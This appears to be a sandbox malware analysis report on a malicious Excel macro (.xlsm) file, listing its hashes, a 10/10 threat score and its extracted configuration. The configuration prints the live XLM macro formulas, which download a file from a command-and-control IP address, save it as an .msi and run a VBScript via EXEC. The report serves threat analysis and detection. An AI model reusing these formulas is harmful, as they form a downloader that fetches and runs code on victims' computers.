Overview

overview

10

Static

static

10

f3321b7a6c...0.xlsm

windows7-x64

10

f3321b7a6c...0.xlsm

windows10-2004-x64

10

Sharing

Copy URL Twitter E-mail

General

  • Target

    f3321b7a6c00a1a8e390429c3aa13b20

  • Size

    6KB

  • MD5

    f3321b7a6c00a1a8e390429c3aa13b20

  • SHA1

    2c3eeb30e392632ec8b1f7e0bc835194382ccc78

  • SHA256

    809e294d104594986eb99f89336341f2bd4b60c82131d6ea1c3aa66795bc22a5

  • SHA512

    f2f5736145e4379d4073a33806f10300061f7daaedf8d77e68cec8a9c61476aaf93d52ffbfac634b4be4c8e166eb50280f41ea6fe7372a8a39d84e3d1d09fe86

  • SSDEEP

    192:NDSwuSqbrA2OmmfRt8UhHFBFYurb98yJ0+w:NLuDM2w31FY+b98yJa

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php
Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Signatures

Files

  • f3321b7a6c00a1a8e390429c3aa13b20
    .xlsm office2007